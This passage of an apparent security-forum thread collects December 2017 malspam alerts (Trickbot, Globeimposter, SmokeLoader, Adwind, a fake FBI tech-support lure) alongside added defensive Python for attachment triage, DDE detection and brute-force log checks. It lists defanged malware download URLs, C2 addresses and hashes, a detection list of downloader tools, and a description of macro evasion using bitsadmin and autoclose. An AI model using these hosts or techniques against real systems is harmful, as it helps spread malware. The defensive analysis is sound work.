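                   "myaccounts-webapps-verify-updated-informations(dot)epauypal(dot)com/myaccount/e6abe",
                   "lqftdwbmxYYfT@ marketplace.amazon .com"):
        print(f"{sample!r:<90} -> {classify(sample)}")
```

The substring test will also fire on honest domains that happen to contain a brand token, and the edit-distance test gets noisy for short brand names, so treat both as triage hints to feed into a sandbox or a manual look rather than as a block decision.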

AplusWebMaster
2017-12-12, 14:20
FYI...

Fake 'Amazon invoice' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-amazon-marketplace-invoice-emails-deliver-ransomware-via-necurs-botnet/
12 Dec 2017 - "... Necurs botnet has changed again today...
Update: I am informed that this is definitely Trickbot banking trojan, not ransomware, although several antiviruses are detecting it as a ransomware version. An email with the subject of 'Invoice RE-2017-12-12-00572' (random numbers after the date) pretending to come from Amazon Marketplace <lqftdwbmxYYfT@ marketplace.amazon .com> (random characters before the @) with a malicious word doc attachment...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/necurs_amazon_marketplace.png

RE-2017-12-12-00572.doc - Current Virus total detections 12/59*. Hybrid Analysis**...
This malware downloads from
http ://ragazzemessenger .com/nyRhdkwSD which gave ejmaryj8.exe (VirusTotal 9/67[3]) (Hybrid Analysis[4])...
There will be loads of other download sites... DO NOT follow the advice they give to enable macros or enable editing to see the content..."
* https://www.virustotal.com/en/file/89cdf68a65bc1bc227ac696ef9e8e74a654319518f84428ca71d1bce270a661e/analysis/1513080354/
RE-2017-12-12-00775.doc

** https://www.hybrid-analysis.com/sample/89cdf68a65bc1bc227ac696ef9e8e74a654319518f84428ca71d1bce270a661e?environmentId=100
DNS Requests
158.69.26.138
98.124.251.168
Contacted Hosts
98.124.251.168
158.69.26.138
67.209.219.92
179.43.147.243
95.213.237.241

3] https://www.virustotal.com/en/file/274170f2acf032561911675964fe1852e63e5af6bf97c3a76d6273cf7b5bf1c0/analysis/1513080273/

4] https://www.hybrid-analysis.com/sample/274170f2acf032561911675964fe1852e63e5af6bf97c3a76d6273cf7b5bf1c0?environmentId=100

ragazzemessenger .com: 98.124.251.168: https://www.virustotal.com/en/ip-address/98.124.251.168/information/
> https://www.virustotal.com/en/url/a889ef86e763ccc81667244efcdfc42f8fdc14b6daba70a33db05fa7c29c4c38/analysis/

:fear::fear: :mad:
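Several of the posts above hinge on a file's real type disagreeing with its name: a .png download that is really a PE executable (ser.png, logo.png, ser0712.png), a .zip or .doc attachment that is really a 7z archive, a word doc that is an OLE container carrying a macro, and in every case a base64 MIME part that has to be decoded before any of this is visible. The following is an added example (mine, not code from the myonlinesecurity posts): it decodes each attachment of a raw message with the standard email package, sniffs the magic bytes and reports where name and content disagree. The message it parses is constructed inline with dummy headers and a harmless MZ stub, not real malware.

```python
"""Decode e-mail attachments and check what they really are, not what their name says.

Added example for this thread, not code from the myonlinesecurity posts.  The sample
message is constructed here: the "logo.png" attachment is a harmless 64-byte buffer
that merely starts with an MZ header, the ".zip" is a bare 7z signature, and the
".doc" is a bare OLE header; none of them is real malware.
"""
import email
import os
from email import policy
from email.message import EmailMessage

# (magic bytes, container kind) in the order they should be tried
SIGNATURES = [
    (b"MZ", "exe"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"%PDF", "pdf"),
    (b"7z\xbc\xaf\x27\x1c", "7z"),
    (b"PK\x03\x04", "zip"),                            # also OOXML (.docx/.xlsx/.docm)
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole"),      # legacy .doc/.xls, where VBA lives
    (b"Rar!\x1a\x07", "rar"),
]
# extensions that are consistent with each detected container
EXT_OK = {
    "exe": {"exe", "dll", "scr"},
    "png": {"png"},
    "pdf": {"pdf"},
    "7z": {"7z"},
    "zip": {"zip", "docx", "xlsx", "docm", "xlsm", "jar"},
    "ole": {"doc", "xls", "ppt", "msg"},
    "rar": {"rar"},
}
MACRO_CAPABLE = {"doc", "xls", "ppt", "docm", "xlsm", "pptm"}


def sniff(data: bytes) -> str:
    for magic, kind in SIGNATURES:
        if data.startswith(magic):
            return kind
    return "unknown"


def triage_attachment(name: str, data: bytes) -> dict:
    ext = os.path.splitext(name)[1].lstrip(".").lower()
    kind = sniff(data)
    if kind == "exe":
        verdict = "executable"            # a PE file whatever it is called
    elif kind != "unknown" and ext not in EXT_OK[kind]:
        verdict = "extension-mismatch"    # e.g. a 7z archive named .zip or .doc
    elif kind == "ole" or ext in MACRO_CAPABLE:
        verdict = "macro-capable"         # next step: olevba / oledump, never "Enable Content"
    elif kind == "unknown":
        verdict = "unknown"
    else:
        verdict = "ok"
    return {"name": name, "ext": ext, "kind": kind, "verdict": verdict}


def triage_message(raw: bytes) -> list:
    """Walk a raw RFC 5322 message; the email package base64-decodes each part for us."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        results.append(triage_attachment(name, data))
    return results


def build_sample_message() -> bytes:
    """Constructed message mimicking the posts: empty body, three mis-named attachments."""
    msg = EmailMessage()
    msg["From"] = "copier@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Scanned from HP"
    msg.set_content("")
    dummy_pe = b"MZ\x90\x00" + b"\x00" * 60                     # DOS header only, not a real PE
    msg.add_attachment(dummy_pe, maintype="image", subtype="png", filename="logo.png")
    msg.add_attachment(b"7z\xbc\xaf\x27\x1c" + b"\x00" * 26,
                       maintype="application", subtype="zip", filename="201712054051.zip")
    msg.add_attachment(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 504,
                       maintype="application", subtype="msword", filename="Protected80.doc")
    return msg.as_bytes()


if __name__ == "__main__":
    for r in triage_message(build_sample_message()):
        print(f"{r['name']:<22} claims .{r['ext']:<4} is {r['kind']:<8} -> {r['verdict']}")
```

Feed it a saved .eml from the quarantine and the verdict tells you whether the next step is a PE sandbox run, an archive extraction (the mis-named 7z cases), or a macro dump of the OLE file; the point is that none of those decisions depend on the filename the attacker chose.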

AplusWebMaster
2017-12-15, 12:14
FYI...

Fake 'Scan' SPAM - delivers Globeimposter ransomware
- https://myonlinesecurity.co.uk/another-necurs-mistake-tries-to-deliver-globeimposter-ransomware-but-fails/
15 Dec 2017 - "... Necurs botnet has messed up again today... an email with the subject of 'Scan' pretending to come from random names and email addresses... It is trivially easy to decode the base64 section, create the 7z file & extract the vbs to get the Globeimposter ransomware they are attempting to deliver. Over the last few weeks we have seen this behaviour several times. Sometimes with 7z or zip files. Sometimes with word docs...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/2017-12-15_08-02-13.png

Scan_00057.7z: - Extracts to: Scan_005287.vbs - Current Virus total detections 7/60*. Hybrid Analysis**...
This particular version downloads from
http ://peopleiknow .org/JKHhgdf72? - there will be several other locations in -other- vbs files...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/8a9728267c3facb34c92e769a5d70392d9393752bd030bf2e8679319b12ccce5/analysis/1513324220/
Scan_005287.vbs

** https://www.hybrid-analysis.com/sample/8a9728267c3facb34c92e769a5d70392d9393752bd030bf2e8679319b12ccce5?environmentId=100

peopleiknow .org: 67.210.102.240: https://www.virustotal.com/en/ip-address/67.210.102.240/information/
> https://www.virustotal.com/en/url/1e01c9c077b0a31fc1a4feaf40cdaa1fec6b7ea5ed7c81191629026a7fe43e61/analysis/
___

Fake FBI phish - leads to Tech Support Scam
- https://myonlinesecurity.co.uk/fake-fbi-you-are-a-victim-of-cyber-crime-message-leads-to-tech-support-scam/
14 Dec 2017 - "... It pretends to be a message from the FBI saying you might be a victim of cyber crime and you should ring the phone number in the email. The phone number belongs to a dubious Tech Support service:
globalphonesupport .com: 69.89.31.186: https://www.virustotal.com/en/ip-address/69.89.31.186/information/

If you are unwise enough to ring the number you will be falsely told that there is something wrong with your computer. 'It needs cleaning'... and it will cost you at least one hundred USD to repair.
It is highly likely that these scammers will ask you to install a 'remote access program' (although they call it something else)...
Unusually there is no link in this email. [Some] of these scams will have a link that leads to a page saying your computer is infected with Zeus trojan or similar that locks-the-browser and displays the phone number to ring...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/fake_FBI_tech_support-Scam.png

" ... RE: Case: 8755174734
The IP address registered on your name was referred to our ICC Center multiple times as being a possible victim of cyber crime.
We believe that your IP address and other identifying information were used to commit several computer fraud and abuse crimes. This investigation covers the time period from August 7, 2017 to the present date.
We appreciate your instant assistance to this matter. Please contact us urgently with all of the information concerning this case, at telephone number listed below... "

These emails use Social engineering tricks to persuade you to open the attachments, follow links or ring the phone number in the email...
___

AIM - discontinued on Dec 15, 2017
- https://help.aol.com/articles/aim-discontinued
"As of December 15, 2017, AOL Instant Messenger products and services will be shut down and will no longer work.
If you are an AOL member, AOL products and services like AOL Mail, AOL Desktop Gold and Member Subscriptions will not be affected. To view your benefits, please visit: https://mybenefits.aol.com/ "

:fear::fear: :mad:
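
The Dec 15 post above notes that the malformed Necurs emails carry the attachment as a bare base64 section that can simply be decoded to recover the 7z. The Python below is an added example for this thread (not code from myonlinesecurity or the blog author): it walks a raw message, pulls out every run of base64-only lines, decodes it, and reports the container type from its leading bytes together with a SHA-256 for lookup on VirusTotal or Hybrid Analysis. The message it parses is a constructed sample whose "attachment" is only a fake 7z header plus filler, so nothing in it is a real archive; the sender and address are placeholders.

```python
import base64
import binascii
import hashlib
import re
import textwrap

# Leading bytes of the container types this thread keeps seeing, plus PE.
MAGIC = [
    (b"7z\xbc\xaf\x27\x1c", "7z"),
    (b"PK\x03\x04", "zip"),
    (b"MZ", "pe"),
]

# A line that consists only of base64 alphabet, optionally padded.
B64_LINE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def find_base64_blobs(text, min_chars=40):
    """Return decoded byte blobs for every run of base64-only lines in text.

    Covers the malformed Necurs case where the attachment body is dumped into
    the message text without a usable MIME part header.
    """
    blobs, run = [], []

    def flush():
        data = "".join(run)
        run.clear()
        if len(data) >= min_chars and len(data) % 4 == 0:
            try:
                blobs.append(base64.b64decode(data, validate=True))
            except binascii.Error:
                pass  # looked like base64 but did not decode

    for line in text.splitlines():
        line = line.strip()
        if B64_LINE.match(line) and (len(line) >= 20 or run):
            run.append(line)
            if len(line) < 20:  # a short line can only be the blob's last line
                flush()
        else:
            flush()
    flush()
    return blobs


def sniff(blob):
    """Coarse type from the first bytes, ignoring whatever name the mail gave it."""
    for magic, name in MAGIC:
        if blob.startswith(magic):
            return name
    return "unknown"


def carve_attachments(raw_email):
    """Describe every embedded blob: type by magic bytes, size and SHA-256."""
    return [
        {"type": sniff(b), "size": len(b), "sha256": hashlib.sha256(b).hexdigest()}
        for b in find_base64_blobs(raw_email)
    ]


# Constructed sample message (not a real capture): the "attachment" is a fake
# 7z signature followed by filler, so it is not an actual archive.
_FAKE_7Z = b"7z\xbc\xaf\x27\x1c" + b"\x00\x04" + b"constructed filler " * 4
SAMPLE_EMAIL = (
    "From: Random Name <random@example.invalid>\r\n"
    "Subject: Scan\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain\r\n"
    "\r\n"
    "Random Name\r\n"
    "\r\n"
    + "\r\n".join(textwrap.wrap(base64.b64encode(_FAKE_7Z).decode(), 76))
    + "\r\n"
)

if __name__ == "__main__":
    for item in carve_attachments(SAMPLE_EMAIL):
        print(item)
```

The hash is the useful output: it lets a mail admin check whether the quarantined blob is already known before anyone bothers unpacking it, and the type check catches the zip variants the post mentions as well as a PE dropped straight into the body.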

AplusWebMaster
2017-12-20, 14:38
FYI...

Fake 'Website Job Application' SPAM - delivers malware
- https://myonlinesecurity.co.uk/more-resume-malspam-with-password-protected-word-doc-attachments-continue-to-plague-us-delivering-a-variety-of-different-malware/
20 Dec 2017 - "... This is a continuation from these 3 previous posts about malware using resumes or job applications as the lure [1] [2] [3]... The primary change in delivery method is the use of a password for the word doc to try to bypass antivirus filters... Today’s version continues to deliver SmokeLoader/Sharik trojan which is a downloader for -other- malware. An email with the subject of 'Website Job Application' coming from Rob Meyers <Gong@ latestmistake .com> (probably random names) with a malicious word doc attachment delivers SmokeLoader/Sharik trojan...
1] https://myonlinesecurity.co.uk/website-job-application-fake-resume-delivers-globe-ransomware/
2] https://myonlinesecurity.co.uk/spear-phishing-fake-resume-malspam-leads-to-malware/
3] https://myonlinesecurity.co.uk/fake-resume-emails-continue-to-deliver-malware/

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/rob_resume_eml-1.png

Rob Resume.doc - Current Virus total detections 11/59*. Hybrid Analysis**... It should be noted that this malicious word doc and the downloaded malware either has some sort of anti-analysis protection or the malware delivery site will reject connections from known sandboxes, VM analysis tools and known researcher or antivirus IP addresses. Neither of the 2 Online sandboxes / analysis tools could retrieve the downloaded malware. That had to be done manually. They have continued with the previous behaviour of using BITS (bitsadmin.exe) to download the file instead of PowerShell. They also are still using “autoclose” in the macro so it doesn’t run until the word doc has been closed, so avoiding any obvious signs of infiltration. Also the downloaded file sleeps for a long, long time before doing anything. This malware downloads from
http ://80.82.67.217/paddle.jpg which of course is -not- an image file but a renamed .exe (ASxas.exe)
VirusTotal 8/67[4]. Hybrid Analysis[5]... HA shows a further download of a bitcoin miner (VirusTotal 43/66[6])
but Anyrun could not get anything despite leaving it running for 10 minutes...
This word doc looks like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/rob_resume_1_doc.png
And after you input the password from the email body (123456) you see a typical page asking you to enable editing and then macros and content:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/rob_resume_2_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d16987127fb303ccee876d2b3ec3798f4d31a659b2a5da32be598f2c32d48a21/analysis/1513715092/
Resume.doc

** https://www.hybrid-analysis.com/sample/d16987127fb303ccee876d2b3ec3798f4d31a659b2a5da32be598f2c32d48a21?environmentId=100

4] https://www.virustotal.com/en/file/f181aafa4cc93117631f2376cb3543d7f4f6c0570cf95cb8bb526e99ab56f095/analysis/1513716371/
paddle.jpg.exe

5] https://www.hybrid-analysis.com/sample/f181aafa4cc93117631f2376cb3543d7f4f6c0570cf95cb8bb526e99ab56f095?environmentId=100
DNS Requests
37.59.55.60
107.181.246.221
Contacted Hosts
139.59.208.246
107.181.246.221
188.165.214.95

6] https://www.virustotal.com/en/file/954e8e88740fd3e659fd4ad0502982dd173db2d90cfca0718bfc739bf886d51c/analysis/
bitcoinminer1

80.82.67.217: https://www.virustotal.com/en/ip-address/80.82.67.217/information/
> https://www.virustotal.com/en/url/f4d8159d93a6824ce918d245181f06263e3b66da31d15c9d1b70cb70d3b4cbe9/analysis/
___

Office as a malware delivery platform: DDE, Scriptlets, Macro obfuscation
... Powerful behind-the-scenes features in Office have suddenly stepped back into the malware limelight, with an onslaught of mostly macro-less attacks starring jimmied Word, Excel and PowerPoint documents
> https://www.computerworld.com/article/3244084/microsoft-windows/office-as-a-malware-delivery-platform-dde-scriptlets-macro-obfuscation.html
Dec 19, 2017 - "... Some clever researchers have found new and unexpected ways to get Word, Excel and PowerPoint documents to deliver all sorts of malware — ransomware, snoopers, even a newly discovered credential stealer that specializes in gathering usernames and passwords. In many cases, these new uses employ methods as old as the hills. But the old warning signs don’t work as well as they once did..."
(Much more detail at the computerworld URL above.)

ADV170021 | Microsoft Office Defense in Depth Update
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170021
12/12/2017 - "... provides enhanced security as a defense-in-depth measure. The update disables the Dynamic Update Exchange protocol (DDE) in all supported editions of Microsoft Word..." - Also:
> https://docs.microsoft.com/en-us/security-updates/securityadvisories/2017/4053440
Updated: Dec 12, 2017

>> https://www.askwoody.com/forums/topic/office-as-a-malware-delivery-platform-dde-scriptlets-macro-obfuscation/#post-153388
Dec 20, 2017

:fear::fear: :mad:
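
The Dec 20 post above gives a defender three things to look for: a downloaded "image" that is really a renamed executable, the DDE field feature in Word documents that ADV170021 now switches off, and a macro that hands the download to bitsadmin.exe instead of PowerShell. The Python below is an added example written for this thread, not code from myonlinesecurity, Microsoft or Computerworld. The .docx it builds is a constructed minimal zip rather than a real Word file, the DDE field inside it carries placeholder strings only, and the process records it scans are constructed in a hypothetical time|parent|child|cmdline format rather than any real sensor's output.

```python
import re
import zipfile
from io import BytesIO

# ---- 1. Payload check: the "jpg" the macro fetched is really a PE file ----
def sniff_type(data):
    """Coarse file type from leading bytes, ignoring the name it was given."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if data.startswith(b"PK\x03\x04"):
        return "zip"   # .docx/.xlsx/.jar are zip containers
    if data.startswith(b"\xd0\xcf\x11\xe0"):
        return "ole"   # legacy binary .doc/.xls
    return "unknown"

EXPECTED_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "exe": "pe",
                 "docx": "zip", "jar": "zip", "doc": "ole"}

def extension_mismatch(filename, data):
    """True when the extension promises one type and the bytes say another."""
    ext = filename.rsplit(".", 1)[-1].lower()
    expected = EXPECTED_TYPE.get(ext)
    return expected is not None and sniff_type(data) != expected

# ---- 2. Lure check: DDE field codes inside a .docx (no macros involved) ----
DDE_FIELD = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)
INSTR_RE = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>|w:instr=\"([^\"]*)\"", re.S)

def docx_dde_fields(docx_bytes):
    """Return (zip member, field instruction) for every DDE field found.

    Field text is joined across <w:instrText> runs before matching, because
    a field split over several runs would otherwise hide the keyword.
    """
    found = []
    with zipfile.ZipFile(BytesIO(docx_bytes)) as z:
        for member in z.namelist():
            if not (member.startswith("word/") and member.endswith(".xml")):
                continue
            xml = z.read(member).decode("utf-8", "replace")
            joined = "".join(a or b for a, b in INSTR_RE.findall(xml))
            if DDE_FIELD.search(joined):
                found.append((member, " ".join(joined.split())))
    return found

def build_sample_docx(instr):
    """Constructed minimal .docx-like zip for testing; not a real Word file.
    The field instruction is deliberately split across two runs."""
    runs = "".join(
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % part
        for part in (instr[:3], instr[3:]))
    xml = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
           '<w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
           '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>')
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", xml)
    return buf.getvalue()

# ---- 3. Endpoint check: an Office process spawning a downloader ----
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOADERS = {"bitsadmin.exe", "powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# Constructed process-creation records in a hypothetical format:
# time|parent image|child image|command line
SAMPLE_LOG = """\
2017-12-20T11:02:01|explorer.exe|winword.exe|WINWORD.EXE "Rob Resume.doc"
2017-12-20T11:09:40|winword.exe|bitsadmin.exe|bitsadmin /transfer (constructed args)
2017-12-20T11:10:05|explorer.exe|chrome.exe|chrome.exe
"""

def office_spawned_downloaders(log_text):
    """Records where Word/Excel/PowerPoint is the parent of a download tool."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue
        ts, parent, child, cmd = parts
        if parent.lower() in OFFICE and child.lower() in DOWNLOADERS:
            hits.append((ts, parent, child, cmd))
    return hits

if __name__ == "__main__":
    print(extension_mismatch("paddle.jpg", b"MZ\x90\x00" + b"\x00" * 60))
    print(docx_dde_fields(build_sample_docx(' DDEAUTO "placeholder_program" "placeholder_args" ')))
    print(office_spawned_downloaders(SAMPLE_LOG))
```

Two points worth noting from the post itself: because the macro runs on "autoclose", a sandbox that opens the document and never closes it sees no download at all, which is why the parent/child rule belongs on the endpoint rather than only in the analysis VM; and the DDE scan is a complement to, not a replacement for, applying the ADV170021 update, since a field split across runs or hidden in a different part of the package is exactly the obfuscation the Computerworld piece describes.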

AplusWebMaster
2017-12-21, 14:29
FYI...

DoubleClick Advertising network XSS vuln
- https://myonlinesecurity.co.uk/doubleclick-advertising-network-xss-vulnerability/
21 Dec 2017 - "Just a quick alert about an email from Google warning of vulnerabilities in some DoubleClick publishers. This has been sent to all website owners who use DoubleClick in any form. However this will ONLY affect website owners who use DoubleClick as a stand alone service to display adverts. It does not affect website owners who use Google AdSense to display adverts and have enabled the additional options to also use DoubleClick as a method of advertising in the allowed advertisers section of your Google AdSense settings page:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/doubleclick_XSS_alert.png
The email reads:
'Dear Customer,
We’ve identified certain vendor files that may contain XSS vulnerabilities which could pose a security risk. Please check if you are hosting these files and remove them with the help of your webmaster. These are the currently identified third-party vendor files...'"
(More detail at the myonlinesecurity URL above.)

> https://support.google.com/dfp_premium/answer/7622991
___

Cryptominers...
- https://umbrella.cisco.com/blog/2017/12/19/mounting-mining-mayhem/
Dec 19, 2017 - "As cryptocurrencies continue to increase in value, cryptomining becomes increasingly more lucrative. With Bitcoin nearly reaching $18,000USD/1BTC, speculation that other cryptocurrencies such as Ethereum and Monero may hit this mark eventually is rising. Monero is especially interesting given that one of its primary advantages is the relatively low processing power needed to mine it. Given that it is capable of being mined even by consumer grade computers, many organizations have tried to capitalize on this facet of the currency.
> https://s3-us-west-1.amazonaws.com/umbrella-blog-uploads/wp-content/uploads/2017/12/14112021/RiseOfTheCoin.png
Launched in September of this year, Coinhive is a service that has transformed the internet already in its short life. 'Coinhive' allows users to embed JavaScript API calls to enable anonymous mining of Monero cryptocurrency in browsers. 'Monero' aims to improve on existing cryptocurrency design by obscuring the sender, recipient and amount of every transaction made, as well as making the mining process more egalitarian by lowering processing costs. Though Coinhive as an organization has said they want users to come up with new uses for their service, it’s hard to imagine they wanted users to create apps that then go on to be abused...
It’s impossible to say with accuracy where the future will take cryptocurrencies or cryptominers, but they’re almost certainly here to stay. As the internet continues to evolve in its third decade of existence, enterprising individuals will always be looking for the next motherlode, taking advantage of a landscape that others can’t see."
(More detail at the umbrella.cisco URL above.)

:fear::fear::fear:

AplusWebMaster
2017-12-22, 13:31
FYI...

Fake 'Outstanding Statement' SPAM - delivers ransomware
- https://myonlinesecurity.co.uk/fake-prime-express-travel-statement-delivers-globeimposter-ransomware/
22 Dec 2017 - "... malware downloaders from the Necurs botnet... an email with the subject of 'Outstanding Statement' pretending to come from Prime Express Oldham <sales62@ primeexpressuk .com> (random numbers after sales) delivering Globeimposter ransomware...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/2017-12-22_11-48-59.png

Customer Statement (122017_6816162).7z: Extracts to: Customer Statement (122017_51767638).js
Current Virus total detections 16/55*. Hybrid Analysis**...
This js file downloads from
http ://www.upperlensmagazine .com/tOldHSYW??DVTCGAtym=DVTCGAtym (VirusTotal 11/68[3]). As usual there will be 6 or 8 other download sites... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/794dcfdcc1362140eee6fcda11ddf239ab048a965bba634bb787321db9672cfa/analysis/1480616575/
-6dt874p53077.js

** https://www.hybrid-analysis.com/sample/acbecd62827ce0090665d5a9adb5ca27837432b19bd64f83542c17fbe0be74a2?environmentId=100
DNS Requests
45.126.209.154
Contacted Hosts
45.126.209.154

3] https://www.virustotal.com/en/file/da3ab88c61deabf4cb4d296cc0b4a586eeedc89e87adc4ea648ab8fe6a41346c/analysis/1513941343/
GWMadFzby2.exe

upperlensmagazine .com: 45.126.209.154: https://www.virustotal.com/en/ip-address/45.126.209.154/information/
> https://www.virustotal.com/en/url/3d44d1e7fcf73afeb2338e8159d6e252f5e439b6aceae0216c16433011d3ae1b/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-12-24, 15:37
FYI... Bah Humbug! ...

Fake 'UPS Invoice' SPAM - delivers Java Adwind
- https://myonlinesecurity.co.uk/fake-your-ups-invoice-is-ready-malspam-delivers-java-adwind-java-jrat-trojan/
24 Dec 2017

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/fake_UPS_Invoice.png

INVOICE.zip: extracts to INVOICEE.jar (533kb) - Current Virus total detections 14/61* | Hybrid Analysis**...

"... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."

* https://www.virustotal.com/en/file/f2a298fa8e51713b4d2ee94e3e68945ded5e2ff4f7e2422e5c3acf4275b3cabc/analysis/1514092872/
INVOICEE.jar

** https://www.hybrid-analysis.com/sample/f2a298fa8e51713b4d2ee94e3e68945ded5e2ff4f7e2422e5c3acf4275b3cabc?environmentId=100
DNS Requests
185.171.25.4
Contacted Hosts
46.246.120.179
92.122.154.56

:fear::fear: :mad:

AplusWebMaster
2017-12-26, 21:00
FYI...

Fake blank/empty SPAM - delivers globeimposter ransomware
- https://myonlinesecurity.co.uk/more-necurs-botnet-spam-delivers-globeimposter-ransomware/
26 Dec 2017 - "... malware downloaders from the Necurs botnet... a blank/empty email with the subject of 'CCE26122017_004385' (random numbers after the date) pretending to come from random names and random email addresses that just has a 7z attachment containing a .js file... One of the emails looks like:
From: Emmitt <Emmitt@ kendrixcorp .com>
Date: Tue 26/12/2017 15:04
Subject: CCE26122017_004385
Attachment: CCE26122017_004385.7z
Body content: completely blank/empty

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/12/2017-12-26_15-28-28.png

CCE26122017_004385.7z: Extracts to: CCE26122017_48779.js - Current Virus total detections 11/58*. Hybrid Analysis**...
This particular version downloads from
http ://www.thedournalist .com/mnbTREkfDS??jYAbcsB=jYAbcsB (there will normally be 6-8 other download locations)
(VirusTotal 7/68[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/100322884e21b1bac77fb7634ae89e352610de9d734a509365e2a3c242a1369a/analysis/1514301126/
CCE26122017_48779.js

** https://www.hybrid-analysis.com/sample/100322884e21b1bac77fb7634ae89e352610de9d734a509365e2a3c242a1369a?environmentId=100
DNS Requests
86.106.30.37
Contacted Hosts
86.106.30.37

3] https://www.virustotal.com/en/file/3a9d5976fbf41daf80f0eb9e6b7aadcece52a82fe9609984ef7f8ea166048547/analysis/1514301538/
mnbTREkfDS.exe

thedournalist .com: 86.106.30.37: https://www.virustotal.com/en/ip-address/86.106.30.37/information/
___

Massive Brute-Force Attack Infects WordPress Sites with Monero Miners
- https://www.bleepingcomputer.com/news/security/massive-brute-force-attack-infects-wordpress-sites-with-monero-miners/
Dec 20, 2017 - "... WordPress sites around the globe have been the targets of a massive brute-force campaign during which hackers attempted to guess admin account logins in order to install a Monero miner on compromised sites...
Once attackers get in, they install a Monero miner, and they also use the infected site to carry out further brute-force attacks. These two operations don't happen at the same time, and each site is either brute-forcing other WordPress sites or mining Monero..."

WordPress Brute Force Attack Campaign
- https://www.wordfence.com/blog/2017/12/aggressive-brute-force-wordpress-attack
Dec 18, 2017 - "A massive distributed brute force attack campaign targeting WordPress sites started this morning at 3am Universal Time, 7pm Pacific Time. The attack is broad in that it uses a large number of attacking IPs, and is also deep in that each IP is generating a huge number of attacks. This is the most aggressive campaign we have seen to date, peaking at over 14 million attacks per hour. The attack campaign was so severe that we had to scale up our logging infrastructure to cope with the volume when it kicked off, which makes it clear that this is the highest volume attack that we have seen in Wordfence history, since 2012..."
___

Remove the Slmgr32.exe Monero CPU Miner
- https://www.bleepingcomputer.com/virus-removal/remove-slmgr32.exe-monero-cpu-miner
Nov 3, 2017

:fear::fear: :mad:
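
The WordPress items in the Dec 26 post describe a high-volume distributed campaign guessing admin logins. Below is an added example for this thread (not code from BleepingComputer or Wordfence) of the kind of check a site owner can run over a web server access log: it groups POSTs to the login endpoints by client IP and flags any IP that sends more than a threshold of them inside a sliding time window. The log lines it reads are constructed, use the documentation IP ranges, and are in the common combined log format; the threshold and window are assumed defaults to be tuned per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined-log-format line: ip ident user [time] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# xmlrpc.php also accepts credentials, so it is counted with wp-login.php
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def login_posts_by_ip(log_text):
    """Timestamps of POSTs to the login endpoints, grouped by client IP."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] in LOGIN_PATHS:
            by_ip[rec["ip"]].append(rec["ts"])
    return by_ip

def brute_force_ips(log_text, threshold=5, window=timedelta(minutes=1)):
    """IPs that sent at least `threshold` login POSTs inside any sliding
    `window`, mapped to the peak count seen in a single window."""
    flagged = {}
    for ip, stamps in login_posts_by_ip(log_text).items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

# Constructed access-log sample (documentation IP ranges, not real clients).
SAMPLE_LOG = """\
203.0.113.5 - - [20/Dec/2017:03:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3123
203.0.113.5 - - [20/Dec/2017:03:00:04 +0000] "POST /wp-login.php HTTP/1.1" 200 3123
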